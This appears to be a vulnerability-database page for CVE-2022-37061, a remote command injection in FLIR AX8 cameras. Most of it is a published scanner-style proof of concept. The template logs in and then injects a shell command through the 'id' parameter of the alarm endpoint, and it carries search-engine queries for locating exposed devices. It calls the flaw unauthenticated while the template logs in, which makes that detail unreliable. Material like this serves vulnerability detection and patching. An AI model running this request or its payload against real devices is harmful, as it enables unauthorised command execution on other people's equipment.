CVE-2022-37061: FLIR AX8 1.46.16 - Remote Command Injection

日期: 2025-08-01 | 影响软件: FLIR AX8 1.46.16 | POC: 已公开

漏洞描述

FLIR AX8 version 1.46.16 and below is susceptible to an unauthenticated remote command injection vulnerability.The vulnerability exists in the alarm functionality where user-supplied input in the 'id' parameter is not properly sanitized,allowing attackers to inject and execute arbitrary OS commands.

PoC代码[已公开]

id: CVE-2022-37061

info:
  name: FLIR AX8 1.46.16 - Remote Command Injection
  author: ritikchaddha
  severity: critical
  description: |
    FLIR AX8 version 1.46.16 and below is susceptible to an unauthenticated remote command injection vulnerability.The vulnerability exists in the alarm functionality where user-supplied input in the 'id' parameter is not properly sanitized,allowing attackers to inject and execute arbitrary OS commands.
  remediation: |
    Upgrade to the latest version of FLIR AX8 that addresses this vulnerability. Implement proper input validation and sanitization for all user-supplied data.
  reference:
    - https://www.exploit-db.com/exploits/52240
    - https://www.flir.com/products/ax8-automation/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-37061
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-37061
    cwe-id: CWE-78
    epss-score: 0.93034
    epss-percentile: 0.99772
  metadata:
    verified: true
    max-request: 1
    vendor: flir
    product: ax8
    shodan-query: title:"FLIR"
    fofa-query: app="FLIR-AX8"
  tags: cve,cve2022,flir,ax8,rce,authenticated

http:
  - raw:
      - |
        POST /login/dologin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user_name={{username}}&user_password={{password}}

      - |
        POST /res.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        action=alarm&id=2;id

    matchers-condition: and
    matchers:
      - type: regex
        part: body_2
        regex:
          - 'uid=([0-9(a-z)]+)'
          - 'gid=([0-9(a-z)]+)'
          - 'visualBeep'
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100c0a3892f4263c891da9c384f26db2f6e228603049831f20f0aff281221daadee022100d99c07ba601235277502e780e049a159387eb0ba824547808ac212b8a6c53d25:922c64590222798bb761d5b6d8e72950

相关漏洞推荐